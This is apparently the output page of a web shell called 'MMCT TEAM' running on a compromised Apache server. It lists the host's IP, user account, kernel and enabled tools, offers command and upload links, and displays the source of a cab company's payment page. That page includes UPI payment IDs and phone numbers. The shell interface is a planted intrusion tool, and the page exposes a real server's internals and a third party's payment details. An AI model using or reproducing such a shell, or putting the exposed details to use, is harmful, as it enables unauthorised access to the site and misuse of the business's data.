MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.136.26.156
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/thegloriousadventure.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/thegloriousadventure.com/payment.php
<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Pay Now Dial 4 Cab</title>
    <meta name="description" content="Pay Now Dial 4 Cab">
    <link rel="canonical" href="<?php echo $canonical?>">
    <?php include "links.php";?>
     <style>
        #payment{
            height: 100%;
            width: 100%;
            padding: 20px;
        }
        .main{
            padding:20px;
            box-shadow: 0 3px 6px rgba(0,0,0,0.16), 0 3px 6px rgba(0,0,0,0.23);
        }
        .main .scanner-img{
            border-right: 1px solid;
        }
        .pmt-opt{
            padding-top:20px;

        }
        .payment-cont span{
            font-weight: 600;
        }
        .note{ 
            padding: 20px 0;
            font-weight: 700;
            font-size: 22px;
        }
        @media (max-width:991px){
            .main .scanner-img img{
                width:100%;
            }
            .note{ 
            padding: 5px 0;
            font-weight: 700;
            font-size: 15px;
        }
        }
        @media (max-width:768px){
            .main .scanner-img{
                border:none;
            }
            .main .scanner-img img{
                width:100%;
            }
            .note{ 
            padding: 10px 0;
            font-weight: 700;
            font-size: 18px;
        }
        }
    </style>
</head>
<body>
    <?php include "header.php";?>
    <section id="payment">
        <div class="container">
            <div class="main">
                <div class="row">
                    <div class="col-lg-6 col-md-6 col-sm-12">
                        <div class="scanner-img">
                            <img src="<?php echo $wspath ?>assets/images/scanner.jpeg" width="80%" alt="scanner">
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-6 col-sm-12">
                        <div class="payment-cont pmt-opt">
                            <div class="google-pay">
                                <img width="60px;" src="<?php echo $wspath ?>assets/images/okicici.png" alt="Dial4Cab">
                                <span>volvobus1987@okicici</span>
                            </div>
                            <div class="phone-pe pmt-opt">
                                <img src="<?php echo $wspath ?>assets/images/phone-pay.png" alt="Dial4Cab">
                                <span>9718203332@ybl</span>
                            </div>
                            <div class="paytm pmt-opt">
                                <img src="<?php echo $wspath ?>assets/images/pytm1.png" alt="Dial4Cab">
                                <span>9718203332@paytm</span>
                            </div>
                            <p class="note">After payment please send payment reciept on this whatsapp number.</p>
                            <div class="whatsapp">
                                <img src="<?php echo $wspath ?>assets/images/wstap.png" width="50px" alt="Dial4Cab">
                                <span>+91 72920 31003</span>
                            </div>
                            <p class="note">Grateful for choosing us! Enjoy your journey with Dial4Cab. Safe travels!</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <?php include "footer.php"?>
</body>
</html>

MMCT - 2023